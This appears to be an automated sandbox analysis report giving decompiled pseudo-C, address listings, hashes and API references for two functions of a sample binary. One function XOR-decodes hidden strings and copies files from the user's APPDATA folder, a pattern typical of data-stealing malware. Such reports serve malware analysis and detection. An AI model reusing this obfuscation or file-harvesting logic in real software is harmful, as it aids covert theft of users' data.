                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 4bfa88b2b7b229cb4601791903e6e5e4b8f2942e6b87c0fc3a98fa440d0724ee
                                    • Instruction ID: d0de90cc1dd1245bb5e224f4b68fb706b2e71b59a6eec8c21fb7f7cb3807f770
                                    • Opcode Fuzzy Hash: 4bfa88b2b7b229cb4601791903e6e5e4b8f2942e6b87c0fc3a98fa440d0724ee
                                    • Instruction Fuzzy Hash: 1361C5729007059FDB21FF68C882BBAB7E8FF45720F184569E995EB281E7709D00CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0081D88B Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 324fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E0081D88B(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				void* _t152;
				signed int _t154;
				void* _t155;
				signed int _t157;
				intOrPtr _t164;
				void* _t165;
				void* _t169;
				void* _t172;
				void* _t182;
				int _t191;
				signed int _t203;
				int _t206;
				void* _t210;
				signed int _t213;
				intOrPtr* _t215;
				signed char _t220;
				void* _t221;
				int _t223;
				int _t232;
				void* _t278;
				void* _t282;
				void* _t286;
				intOrPtr _t287;
				int _t293;
				void* _t297;
				void* _t298;
				void* _t309;
				intOrPtr _t311;
				intOrPtr _t315;
				void* _t320;
				void* _t322;
				intOrPtr _t323;
				void* _t325;
				signed char _t340;

				_t325 = __eflags;
				L00890CFC(0x8925a1, __ebx, __ecx, __edx);
				_t323 = _t322 - 0x128;
				_push(__ebx);
				 *((intOrPtr*)(_t320 - 0x10)) = _t323;
				_t297 = 8;
				 *(_t320 - 0x1c) = 0;
				_t309 = L00818F5D(0, _t320 - 0x104, _t297);
				_t298 = 4;
				 *(_t320 - 4) = 0;
				_t313 = L00818F5D(0, _t320 - 0xec, _t298);
				 *(_t320 - 4) = 1;
				_t152 = E0082E8C7(0, _t320 - 0x134, 0x8b2a8c, _t309);
				 *(_t320 - 4) = 2;
				E0082FA3B(_t320 - 0x44,  *(_t320 - 0x14), _t152, _t151, "\\");
				_t154 = 3;
				_t300 = _t320 - 0x44;
				 *(_t320 - 0x18) = _t154;
				 *(_t320 - 4) = _t154;
				_t155 = E0082E917(_t320 - 0x11c, _t320 - 0x44, _t325, ".");
				_push(_t309);
				_push(_t155);
				_push( *(_t320 - 0x14));
				 *(_t320 - 4) = 4;
				E0082FA3B(_t320 - 0x5c);
				_t157 = 3;
				 *(_t320 - 0x1c) = _t157;
				E0082DF41(_t320 - 0x11c);
				E0082DF41(_t320 - 0x44);
				E0082DF41(_t320 - 0x134);
				E0082DF41(_t320 - 0xec);
				 *(_t320 - 4) = 0xa;
				E0082DF41(_t320 - 0x104);
				asm("movaps xmm0, [0x8a90e0]");
				asm("movups [ebp-0x94], xmm0");
				 *((intOrPtr*)(_t320 - 0x84)) = 0x494f5c41;
				_t248 =  *((intOrPtr*)( *[fs:0x2c]));
				_t164 =  *0x8b5860; // 0x8000004c
				 *((intOrPtr*)(_t320 - 0x80)) = 0x4b42724b;
				 *((intOrPtr*)(_t320 - 0x7c)) = 0x4a424b58;
				 *((short*)(_t320 - 0x78)) = 0x724c;
				 *((char*)(_t320 - 0x76)) = 0x2e;
				if(_t164 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					_t313 = 0x8b5860;
					E0086DB91(_t164, 0x8b5860);
					_t327 =  *0x8b5860 - 0xffffffff;
					_pop(_t248);
					if( *0x8b5860 == 0xffffffff) {
						E0082D1E6(0x8b4d64, _t320 - 0x94);
						L0086DFE8(0x8b4d64, _t327, 0x8959a3);
						L0086DB47(0x8b5860);
						_pop(_t248);
					}
				}
				if( *0x8b4d82 == 0) {
					L6:
					_t165 = E0087614E(_t248, _t300, _t329, "APPDATA");
					 *((intOrPtr*)(_t320 - 0x64)) = 0;
					 *((intOrPtr*)(_t320 - 0x60)) = 0xf;
					 *((char*)(_t320 - 0x74)) = 0;
					L0082DFE8(_t165);
					 *(_t320 - 4) = 0xb;
					E0082E917(_t320 - 0xcc, _t320 - 0x74, _t329, 0x8b4d64);
					 *(_t320 - 4) = 0xd;
					E0082DF41(_t320 - 0x74);
					_t169 = L0081DD3E();
					if( *((char*)(_t169 + 0x25)) == 0) {
						L9:
						 *(_t320 - 0xa4) = 0;
						 *((intOrPtr*)(_t320 - 0xa0)) = 0xf;
						 *((char*)(_t320 - 0xb4)) = 0;
						L0082DFE8(_t169);
						 *(_t320 - 0x14) = 0;
						_push( *(_t320 - 0x14));
						 *(_t320 - 4) = 0xe;
						L0082FEC9(_t320 - 0xcc);
						 *(_t320 - 4) = 0xf;
						_t172 = E00813174(0, _t320 - 0x44, _t309);
						 *(_t320 - 4) = 0xe;
						L0082DD77(_t320 - 0x44);
						if(_t172 == 0) {
							_t232 = 0;
							__eflags = 0;
							L24:
							__eflags =  *((intOrPtr*)(_t320 - 0xa0)) - 0x10;
							 *(_t320 - 0xa4) = _t232;
							_t175 =  >=  ?  *((void*)(_t320 - 0xb4)) : _t320 - 0xb4;
							 *( >=  ?  *((void*)(_t320 - 0xb4)) : _t320 - 0xb4) = _t232;
							__eflags =  *((intOrPtr*)(_t320 - 0xb8)) - 0x10;
							 *(_t320 - 0xbc) = _t232;
							_t177 =  >=  ?  *((void*)(_t320 - 0xcc)) : _t320 - 0xcc;
							 *( >=  ?  *((void*)(_t320 - 0xcc)) : _t320 - 0xcc) = _t232;
							__eflags =  *((intOrPtr*)(_t320 - 0x48)) - 0x10;
							 *(_t320 - 0x4c) = _t232;
							_t179 =  >=  ?  *((void*)(_t320 - 0x5c)) : _t320 - 0x5c;
							 *( >=  ?  *((void*)(_t320 - 0x5c)) : _t320 - 0x5c) = _t232;
							E0082DF41(_t320 - 0xb4);
							E0082DF41(_t320 - 0xcc);
							_t182 = E0082DF41(_t320 - 0x5c);
							 *[fs:0x0] =  *((intOrPtr*)(_t320 - 0xc));
							return _t182;
						}
						_t232 = 0;
						 *(_t320 - 0x14) = 0;
						L0082FEC9(_t320 - 0xcc);
						 *(_t320 - 4) = 0x10;
						L00812E70(0, _t320 - 0x9c, _t320 - 0xcc, _t309, _t313, _t320 - 0x44,  *(_t320 - 0x14));
						L0082DD77(_t320 - 0x44);
						E0081A25A(_t320 - 0x24, _t320 - 0x9c);
						_t311 =  *((intOrPtr*)(_t320 - 0x24));
						_t315 =  *((intOrPtr*)(_t320 - 0x20));
						 *((intOrPtr*)(_t320 - 0x2c)) = _t311;
						 *((intOrPtr*)(_t320 - 0x28)) = _t315;
						E0081A25A(_t320 - 0xd4, _t320 - 0x9c);
						_t268 =  *((intOrPtr*)(_t320 - 0xd0));
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x24], xmm0");
						_t191 = 0;
						 *((intOrPtr*)(_t320 - 0x24)) = 0;
						 *((intOrPtr*)(_t320 - 0x20)) = 0;
						if( *((intOrPtr*)(_t320 - 0xd0)) != 0) {
							E008116CB(_t268);
							_t191 = 0;
						}
						while(_t311 != _t191) {
							 *(_t320 - 0x14) = _t232;
							_push( *(_t320 - 0x14));
							 *(_t320 - 4) = 0x15;
							L0082FEC9(_t320 - 0x5c);
							 *(_t320 - 4) = 0x16;
							E00813225(_t232, _t320 - 0x44, _t320 - 0x5c, _t311);
							_t278 = _t320 - 0x44;
							 *(_t320 - 4) = 0x15;
							L0082DD77(_t278);
							_push(_t278);
							_t317 =  >=  ?  *((void*)(_t320 - 0x5c)) : _t320 - 0x5c;
							E0082E5D4(_t311 + 0x20, _t320 - 0x74);
							_t203 =  *(_t320 - 0x18) | 0x00000100;
							 *(_t320 - 0x18) = _t203;
							 *(_t320 - 0x1c) = _t203;
							_t205 =  >=  ?  *((void*)(_t320 - 0x74)) : _t320 - 0x74;
							_t206 = CopyFileA( >=  ?  *((void*)(_t320 - 0x74)) : _t320 - 0x74,  >=  ?  *((void*)(_t320 - 0x5c)) : _t320 - 0x5c, _t232);
							_t318 = _t206;
							E0082DF41(_t320 - 0x74);
							if(_t206 != 0) {
								_t318 =  >=  ?  *((void*)(_t320 - 0x5c)) : _t320 - 0x5c;
								_t282 = _t311 + 0x20;
								_t210 = E008123EB(_t282, _t320 - 0xec);
								 *(_t320 - 4) = 0x17;
								E0082E5D4(_t210, _t320 - 0x44);
								_t213 =  *(_t320 - 0x18) | 0x00000800;
								 *(_t320 - 0x18) = _t213;
								 *(_t320 - 0x1c) = _t213;
								 *(_t320 - 4) = 0x18;
								_t215 = E0082E946(_t320 - 0x104, _t320 - 0xb4, _t320 - 0x44);
								_t286 = _t282;
								 *(_t320 - 4) = 0x19;
								if( *((intOrPtr*)(_t215 + 0x14)) >= 0x10) {
									_t215 =  *_t215;
								}
								_push(_t286);
								_push(_t286);
								_t287 =  *0x8b4804; // 0x1346140
								E008183DF(_t287, _t215, _t318);
								_t323 = _t323 + 0xc;
								E0082DF41(_t320 - 0x104);
								E0082DF41(_t320 - 0x44);
								L0082DD77(_t320 - 0xec);
								_t220 =  *0x8b4834; // 0x0
								_t340 = _t220;
								_t221 = 1;
								_t292 =  ==  ? _t221 : _t220 & 0x000000ff;
								 *0x8b4834 =  ==  ? _t221 : _t220 & 0x000000ff;
							}
							 *(_t320 - 4) = 0x14;
							E00812EBB(_t232, _t320 - 0x2c, _t311, _t318, _t340);
							_t315 =  *((intOrPtr*)(_t320 - 0x28));
							_t311 =  *((intOrPtr*)(_t320 - 0x2c));
							_t191 =  *((intOrPtr*)(_t320 - 0x24));
						}
						__eflags = _t315;
						if(_t315 != 0) {
							E008116CB(_t315);
						}
						 *(_t320 - 4) = 0xe;
						_t269 =  *((intOrPtr*)(_t320 - 0x98));
						__eflags =  *((intOrPtr*)(_t320 - 0x98));
						if( *((intOrPtr*)(_t320 - 0x98)) != 0) {
							E008116CB(_t269);
						}
						 *(_t320 - 0x14) = _t232;
						_push( *(_t320 - 0x14));
						L0082FEC9(_t320 - 0x5c);
						 *(_t320 - 4) = 0x1b;
						E00813225(_t232, _t320 - 0x74, _t320 - 0x5c, _t311);
						L0082DD77(_t320 - 0x74);
						goto L24;
					}
					_t293 = 0;
					do {
						 *(_t293 + _t169) =  *(_t293 + _t169) ^ 0x0000002e;
						_t293 = _t293 + 1;
					} while (_t293 < 0x26);
					goto L9;
				}
				_t223 = 0;
				do {
					 *(_t223 + 0x8b4d64) =  *(_t223 + 0x8b4d64) ^ 0x0000002e;
					_t223 = _t223 + 1;
					_t329 = _t223 - 0x1f;
				} while (_t223 < 0x1f);
				goto L6;
			}







































                                    0x0081d88b
                                    0x0081d890
                                    0x0081d895
                                    0x0081d89b
                                    0x0081d89e
                                    0x0081d8ab
                                    0x0081d8ac
                                    0x0081d8b4
                                    0x0081d8b8
                                    0x0081d8bf
                                    0x0081d8c7
                                    0x0081d8d3
                                    0x0081d8dd
                                    0x0081d8eb
                                    0x0081d8ef
                                    0x0081d8f6
                                    0x0081d8fc
                                    0x0081d8ff
                                    0x0081d908
                                    0x0081d90b
                                    0x0081d911
                                    0x0081d912
                                    0x0081d913
                                    0x0081d919
                                    0x0081d91d
                                    0x0081d924
                                    0x0081d925
                                    0x0081d92e
                                    0x0081d936
                                    0x0081d941
                                    0x0081d94c
                                    0x0081d957
                                    0x0081d95b
                                    0x0081d966
                                    0x0081d96d
                                    0x0081d974
                                    0x0081d97e
                                    0x0081d980
                                    0x0081d985
                                    0x0081d98c
                                    0x0081d993
                                    0x0081d999
                                    0x0081d9a3
                                    0x0081d9a5
                                    0x0081d9ab
                                    0x0081d9b0
                                    0x0081d9b7
                                    0x0081d9b8
                                    0x0081d9c6
                                    0x0081d9d0
                                    0x0081d9d6
                                    0x0081d9dc
                                    0x0081d9dc
                                    0x0081d9b8
                                    0x0081d9e4
                                    0x0081d9f5
                                    0x0081d9fa
                                    0x0081da04
                                    0x0081da07
                                    0x0081da0e
                                    0x0081da11
                                    0x0081da1e
                                    0x0081da28
                                    0x0081da31
                                    0x0081da35
                                    0x0081da3a
                                    0x0081da43
                                    0x0081da51
                                    0x0081da58
                                    0x0081da5e
                                    0x0081da68
                                    0x0081da6e
                                    0x0081da73
                                    0x0081da7c
                                    0x0081da82
                                    0x0081da86
                                    0x0081da8f
                                    0x0081da93
                                    0x0081da9b
                                    0x0081daa1
                                    0x0081daa8
                                    0x0081dcc7
                                    0x0081dcc7
                                    0x0081dcc9
                                    0x0081dcc9
                                    0x0081dcd6
                                    0x0081dce2
                                    0x0081dce9
                                    0x0081dcf1
                                    0x0081dcf8
                                    0x0081dcfe
                                    0x0081dd05
                                    0x0081dd0a
                                    0x0081dd0e
                                    0x0081dd11
                                    0x0081dd15
                                    0x0081dd17
                                    0x0081dd22
                                    0x0081dd2a
                                    0x0081dd34
                                    0x0081dd3d
                                    0x0081dd3d
                                    0x0081daae
                                    0x0081dab6
                                    0x0081dabf
                                    0x0081dac7
                                    0x0081dad2
                                    0x0081dada
                                    0x0081dae9
                                    0x0081daee
                                    0x0081daf1
                                    0x0081daf4
                                    0x0081daf7
                                    0x0081db07
                                    0x0081db0c
                                    0x0081db12
                                    0x0081db15
                                    0x0081db1a
                                    0x0081db1c
                                    0x0081db1f
                                    0x0081db24
                                    0x0081db26
                                    0x0081db2b
                                    0x0081db2b
                                    0x0081db2d
                                    0x0081db35
                                    0x0081db3b
                                    0x0081db41
                                    0x0081db45
                                    0x0081db4e
                                    0x0081db52
                                    0x0081db57
                                    0x0081db5a
                                    0x0081db5e
                                    0x0081db6a
                                    0x0081db6e
                                    0x0081db76
                                    0x0081db7e
                                    0x0081db87
                                    0x0081db8a
                                    0x0081db90
                                    0x0081db97
                                    0x0081dba0
                                    0x0081dba2
                                    0x0081dba9
                                    0x0081dbbc
                                    0x0081dbc0
                                    0x0081dbc4
                                    0x0081dbcd
                                    0x0081dbd4
                                    0x0081dbdc
                                    0x0081dbe1
                                    0x0081dbe4
                                    0x0081dbea
                                    0x0081dbfb
                                    0x0081dc00
                                    0x0081dc01
                                    0x0081dc09
                                    0x0081dc0b
                                    0x0081dc0b
                                    0x0081dc0d
                                    0x0081dc0e
                                    0x0081dc0f
                                    0x0081dc18
                                    0x0081dc1d
                                    0x0081dc26
                                    0x0081dc2e
                                    0x0081dc39
                                    0x0081dc3e
                                    0x0081dc46
                                    0x0081dc4a
                                    0x0081dc4b
                                    0x0081dc4e
                                    0x0081dc4e
                                    0x0081dc67
                                    0x0081dc6e
                                    0x0081dc73
                                    0x0081dc76
                                    0x0081dc79
                                    0x0081dc79
                                    0x0081dc81
                                    0x0081dc83
                                    0x0081dc87
                                    0x0081dc87
                                    0x0081dc8c
                                    0x0081dc90
                                    0x0081dc96
                                    0x0081dc98
                                    0x0081dc9a
                                    0x0081dc9a
                                    0x0081dc9f
                                    0x0081dca5
                                    0x0081dcab
                                    0x0081dcb4
                                    0x0081dcb8
                                    0x0081dcc0
                                    0x00000000
                                    0x0081dcc0
                                    0x0081da45
                                    0x0081da47
                                    0x0081da47
                                    0x0081da4b
                                    0x0081da4c
                                    0x00000000
                                    0x0081da47
                                    0x0081d9e6
                                    0x0081d9e8
                                    0x0081d9e8
                                    0x0081d9ef
                                    0x0081d9f0
                                    0x0081d9f0
                                    0x00000000

                                    APIs
                                      • Part of subcall function 0082DF41: _Deallocate.LIBCONCRT ref: 0082DF50
                                      • Part of subcall function 0086DB91: EnterCriticalSection.KERNEL32(008B3CAC,?,74714EE0,?,0081416B,008B54D0,00000000), ref: 0086DB9C
                                      • Part of subcall function 0086DB91: LeaveCriticalSection.KERNEL32(008B3CAC,?,0081416B,008B54D0,00000000), ref: 0086DBD9
                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 0081DB97
                                      • Part of subcall function 0086DB47: EnterCriticalSection.KERNEL32(008B3CAC,69494B7C,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB51
                                      • Part of subcall function 0086DB47: LeaveCriticalSection.KERNEL32(008B3CAC,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB84
                                      • Part of subcall function 0086DB47: RtlWakeAllConditionVariable.NTDLL ref: 0086DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                    • String ID: .$APPDATA$A\OI$KrBK$Lr$XKBJ
                                    • API String ID: 265086031-2824349140
                                    • Opcode ID: 2bdb7681564c97c6bfbffda4682ce46b14a9683408c5bc8671f810242d29a664
                                    • Instruction ID: f629121c886ed6891d01d619e844e30cbbae42a67ded77e52d05e0df1e009820
                                    • Opcode Fuzzy Hash: 2bdb7681564c97c6bfbffda4682ce46b14a9683408c5bc8671f810242d29a664
                                    • Instruction Fuzzy Hash: 83E19E30D01258DEDF15DBA8D991BDDBBB4FF14300F2441A9E516B7282DB702B89CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00891440 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 275COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 97%
                                    			E00891440(intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				void* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				signed int _v72;
				char _v76;
				signed int _t96;
				intOrPtr _t100;
				void* _t102;
				signed int _t104;
				signed int _t105;
				signed int _t107;
				signed int _t111;
				signed int _t117;
				intOrPtr* _t119;
				signed int _t122;
				void* _t124;
				void* _t125;
				void* _t129;
				signed int _t133;
				intOrPtr _t134;
				void* _t136;
				signed int* _t141;
				intOrPtr _t142;
				intOrPtr _t145;
				void* _t148;
				signed int _t149;
				signed int _t152;
				signed int _t159;
				signed int _t160;
				intOrPtr _t163;
				signed int _t167;
				signed int _t169;
				void _t173;
				signed int _t174;
				signed int _t175;
				intOrPtr _t176;
				signed int _t178;
				signed int _t180;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				void* _t184;
				signed int _t214;

				_push(0xfffffffe);
				_push(0x8b06c0);
				_push( &M0086EFD0);
				_push( *[fs:0x0]);
				_t183 = _t182 - 0x38;
				_t96 =  *0x8b2014; // 0x61232540
				_v12 = _v12 ^ _t96;
				_push(_t96 ^ _t181);
				 *[fs:0x0] =  &_v20;
				_v28 = _t183;
				_t163 = _a4;
				_t6 = _t163 + 8; // 0x83000000
				_t136 =  *_t6;
				_v44 = _t136;
				if((_t136 & 0x00000003) != 0) {
					L68:
					__eflags = 0;
					 *[fs:0x0] = _v20;
					return 0;
				} else {
					_t100 =  *[fs:0x18];
					_t145 =  *((intOrPtr*)(_t100 + 8));
					_v32 = _t145;
					if(_t136 < _t145 || _t136 >=  *((intOrPtr*)(_t100 + 4))) {
						_t13 = _t163 + 0xc; // 0x840ffffe
						_t158 =  *_t13;
						_v36 = _t158;
						if(_t158 == 0xffffffff) {
							L39:
							 *[fs:0x0] = _v20;
							return 1;
						} else {
							_v40 = 0;
							_t148 = 0;
							_t102 = _t136;
							while(1) {
								_t173 =  *_t102;
								if(_t173 != 0xffffffff && _t173 >= _t148) {
									goto L68;
								}
								if( *((intOrPtr*)(_t102 + 4)) == 0) {
									_t174 = _v40;
								} else {
									_t174 = 1;
									_v40 = 1;
								}
								_t148 = _t148 + 1;
								_t102 = _t102 + 0xc;
								if(_t148 <= _t158) {
									continue;
								} else {
									if(_t174 == 0) {
										L14:
										_t167 = _t136 & 0xfffff000;
										_v48 = _t167;
										_t175 = 0;
										_t149 =  *0x8b62b8;
										while(_t175 < _t149) {
											_t158 =  *((intOrPtr*)(0x8b6238 + _t175 * 8));
											_v40 = _t158;
											_t123 =  *((intOrPtr*)(0x8b623c + _t175 * 8));
											_v32 =  *((intOrPtr*)(0x8b623c + _t175 * 8));
											if(_t158 != _t167) {
												_t175 = _t175 + 1;
												continue;
											} else {
												_v8 = 0;
												_t124 = E00890340(_t123);
												_t183 = _t183 + 4;
												if(_t124 == 0) {
													L40:
													_v8 = 0xfffffffe;
													break;
												} else {
													_t158 = _v32;
													_t125 = E00891380(_v32, _v32, _t136, _v36);
													_t183 = _t183 + 0xc;
													if(_t125 == 0) {
														goto L40;
													} else {
														_t32 = _a4 + 4; // 0x8f8e0fc0
														_t129 = E00890230(_v32,  *_t32 - _v32);
														_t183 = _t183 + 8;
														if(_t129 == 0) {
															goto L40;
														} else {
															_v8 = 0xfffffffe;
															if(_t175 > 0) {
																_t141 = 0x8b62bc;
																 *0x8b62bc = 1;
																if( *0x8b62bc == 0) {
																	if( *((intOrPtr*)(0x8b6238 + _t175 * 8)) == _t167) {
																		_t160 = _v40;
																		goto L34;
																	} else {
																		_t133 =  *0x8b62b8;
																		_t175 = _t133 - 1;
																		if(_t175 < 0) {
																			L27:
																			_t160 = _v40;
																		} else {
																			while( *((intOrPtr*)(0x8b6238 + _t175 * 8)) != _t167) {
																				_t175 = _t175 - 1;
																				if(_t175 >= 0) {
																					continue;
																				} else {
																					goto L27;
																				}
																				goto L28;
																			}
																			_t160 =  *((intOrPtr*)(0x8b6238 + _t175 * 8));
																			_v32 =  *((intOrPtr*)(0x8b623c + _t175 * 8));
																		}
																		L28:
																		if(_t175 < 0) {
																			if(_t133 < 0x10) {
																				_t133 = _t133 + 1;
																				 *0x8b62b8 = _t133;
																			}
																			_t175 = _t133 - 1;
																			L34:
																			_t214 = _t175;
																		}
																	}
																	if(_t214 > 0) {
																		_t169 = 0;
																		do {
																			 *((intOrPtr*)(0x8b6238 + _t169 * 8)) = _t160;
																			 *((intOrPtr*)(0x8b623c + _t169 * 8)) = _v32;
																			_t160 =  *((intOrPtr*)(0x8b6238 + _t169 * 8));
																			_v32 =  *((intOrPtr*)(0x8b623c + _t169 * 8));
																			_t169 = _t169 + 1;
																		} while (_t169 <= _t175);
																	}
																	L38:
																	 *_t141 = 0;
																}
															}
															goto L39;
														}
													}
												}
											}
											goto L69;
										}
										_t176 = _v36;
										_t63 =  &_v76; // 0x61232540
										_t104 = VirtualQuery(_t136, _t63, 0x1c);
										__eflags = _t104;
										if(_t104 == 0) {
											goto L39;
										} else {
											__eflags = _v52 - 0x1000000;
											if(_v52 != 0x1000000) {
												L67:
												_t105 = _t104 | 0xffffffff;
												__eflags = _t105;
												 *[fs:0x0] = _v20;
												return _t105;
											} else {
												_v40 = _v72;
												_t104 = E00890340(_v72);
												_t184 = _t183 + 4;
												__eflags = _t104;
												if(_t104 == 0) {
													goto L67;
												} else {
													__eflags = _v56 & 0x000000cc;
													if((_v56 & 0x000000cc) == 0) {
														L47:
														_t140 = _v40;
														_t107 = E00891380(_t158, _v40, _t136, _t176);
														__eflags = _t107;
														if(_t107 == 0) {
															goto L68;
														} else {
															_t74 = _a4 + 4; // 0x8f8e0fc0
															_t111 = E00890230(_t140,  *_t74 - _t140);
															__eflags = _t111;
															if(_t111 == 0) {
																goto L68;
															} else {
																_t141 = 0x8b62bc;
																 *0x8b62bc = 1;
																__eflags =  *0x8b62bc;
																if( *0x8b62bc == 0) {
																	_t178 =  *0x8b62b8;
																	_t152 = _t178;
																	__eflags = _t152;
																	if(__eflags > 0) {
																		_t119 = 0x8b6230 + _t152 * 8;
																		while(1) {
																			__eflags =  *_t119 - _t167;
																			if( *_t119 == _t167) {
																				break;
																			}
																			_t152 = _t152 - 1;
																			_t119 = _t119 - 8;
																			__eflags = _t152;
																			if(_t152 > 0) {
																				continue;
																			}
																			break;
																		}
																		__eflags = _t152;
																	}
																	if(__eflags != 0) {
																		 *((intOrPtr*)(0x8b6234 + _t152 * 8)) = _v72;
																	} else {
																		__eflags = _t178 - 0xf;
																		if(_t178 <= 0xf) {
																			_t117 = _t178;
																			_v40 = _t178;
																		} else {
																			_t117 = 0xf;
																			_v40 = 0xf;
																		}
																		_t159 = 0;
																		__eflags = _t117;
																		if(_t117 >= 0) {
																			_t180 = _v40;
																			_t142 = _v72;
																			do {
																				 *(0x8b6238 + _t159 * 8) = _t167;
																				 *((intOrPtr*)(0x8b623c + _t159 * 8)) = _t142;
																				_t167 =  *(0x8b6238 + _t159 * 8);
																				_t142 =  *((intOrPtr*)(0x8b623c + _t159 * 8));
																				_t159 = _t159 + 1;
																				__eflags = _t159 - _t180;
																			} while (_t159 <= _t180);
																			_t141 = 0x8b62bc;
																			_t178 =  *0x8b62b8;
																		}
																		__eflags = _t178 - 0x10;
																		if(_t178 < 0x10) {
																			 *0x8b62b8 = _t178 + 1;
																		}
																	}
																	goto L38;
																}
																goto L39;
															}
														}
													} else {
														_t122 = E00890230(_v40, _t136 - _v40);
														_t184 = _t184 + 8;
														__eflags = _t122;
														if(_t122 == 0) {
															goto L68;
														} else {
															__eflags =  *(_t122 + 0x24);
															if( *(_t122 + 0x24) < 0) {
																goto L68;
															} else {
																goto L47;
															}
														}
													}
												}
											}
										}
									} else {
										_t19 = _t163 - 8; // 0xe853087b
										_t134 =  *_t19;
										if(_t134 < _v32 || _t134 >= _t163) {
											goto L68;
										} else {
											goto L14;
										}
									}
								}
								goto L69;
							}
							goto L68;
						}
					} else {
						goto L68;
					}
				}
				L69:
			}






















































                                    0x00891443
                                    0x00891445
                                    0x0089144a
                                    0x00891455
                                    0x00891456
                                    0x0089145c
                                    0x00891461
                                    0x00891466
                                    0x0089146a
                                    0x00891470
                                    0x00891473
                                    0x00891476
                                    0x00891476
                                    0x00891479
                                    0x0089147f
                                    0x008917d9
                                    0x008917d9
                                    0x008917de
                                    0x008917ec
                                    0x00891485
                                    0x00891485
                                    0x0089148b
                                    0x0089148e
                                    0x00891493
                                    0x0089149e
                                    0x0089149e
                                    0x008914a1
                                    0x008914a7
                                    0x0089162e
                                    0x00891636
                                    0x00891644
                                    0x008914ad
                                    0x008914ad
                                    0x008914b4
                                    0x008914b6
                                    0x008914b8
                                    0x008914b8
                                    0x008914bd
                                    0x00000000
                                    0x00000000
                                    0x008914cb
                                    0x008914d7
                                    0x008914cd
                                    0x008914cd
                                    0x008914d2
                                    0x008914d2
                                    0x008914da
                                    0x008914db
                                    0x008914e0
                                    0x00000000
                                    0x008914e2
                                    0x008914e4
                                    0x008914fa
                                    0x008914fc
                                    0x00891502
                                    0x00891505
                                    0x00891507
                                    0x00891510
                                    0x00891518
                                    0x0089151f
                                    0x00891522
                                    0x00891529
                                    0x0089152e
                                    0x0089174f
                                    0x00000000
                                    0x00891534
                                    0x00891534
                                    0x0089153c
                                    0x00891541
                                    0x00891546
                                    0x00891645
                                    0x00891645
                                    0x00000000
                                    0x0089154c
                                    0x00891550
                                    0x00891554
                                    0x00891559
                                    0x0089155e
                                    0x00000000
                                    0x00891564
                                    0x00891567
                                    0x00891571
                                    0x00891576
                                    0x0089157b
                                    0x00000000
                                    0x00891581
                                    0x00891581
                                    0x0089158a
                                    0x00891595
                                    0x0089159a
                                    0x0089159e
                                    0x008915ab
                                    0x008915f8
                                    0x00000000
                                    0x008915ad
                                    0x008915ad
                                    0x008915b2
                                    0x008915b7
                                    0x008915ce
                                    0x008915ce
                                    0x008915c0
                                    0x008915c0
                                    0x008915c9
                                    0x008915cc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x008915cc
                                    0x008915e5
                                    0x008915f3
                                    0x008915f3
                                    0x008915d1
                                    0x008915d3
                                    0x008915d8
                                    0x008915da
                                    0x008915db
                                    0x008915db
                                    0x008915e0
                                    0x008915fb
                                    0x008915fb
                                    0x008915fb
                                    0x008915d3
                                    0x008915fd
                                    0x008915ff
                                    0x00891601
                                    0x0089160f
                                    0x00891619
                                    0x00891620
                                    0x00891622
                                    0x00891625
                                    0x00891626
                                    0x00891601
                                    0x0089162a
                                    0x0089162c
                                    0x0089162c
                                    0x0089159e
                                    0x00000000
                                    0x0089158a
                                    0x0089157b
                                    0x0089155e
                                    0x00891546
                                    0x00000000
                                    0x0089152e
                                    0x0089164c
                                    0x00891651
                                    0x00891656
                                    0x0089165c
                                    0x0089165e
                                    0x00000000
                                    0x00891660
                                    0x00891660
                                    0x00891667
                                    0x008917c4
                                    0x008917c4
                                    0x008917c4
                                    0x008917ca
                                    0x008917d8
                                    0x0089166d
                                    0x00891670
                                    0x00891674
                                    0x00891679
                                    0x0089167c
                                    0x0089167e
                                    0x00000000
                                    0x00891684
                                    0x00891684
                                    0x00891688
                                    0x008916ad
                                    0x008916af
                                    0x008916b3
                                    0x008916bb
                                    0x008916bd
                                    0x00000000
                                    0x008916c3
                                    0x008916c6
                                    0x008916cd
                                    0x008916d5
                                    0x008916d7
                                    0x00000000
                                    0x008916dd
                                    0x008916e2
                                    0x008916e7
                                    0x008916e9
                                    0x008916eb
                                    0x008916f1
                                    0x008916f7
                                    0x008916f9
                                    0x008916fb
                                    0x008916fd
                                    0x00891704
                                    0x00891704
                                    0x00891706
                                    0x00000000
                                    0x00000000
                                    0x00891708
                                    0x00891709
                                    0x0089170c
                                    0x0089170e
                                    0x00000000
                                    0x00000000
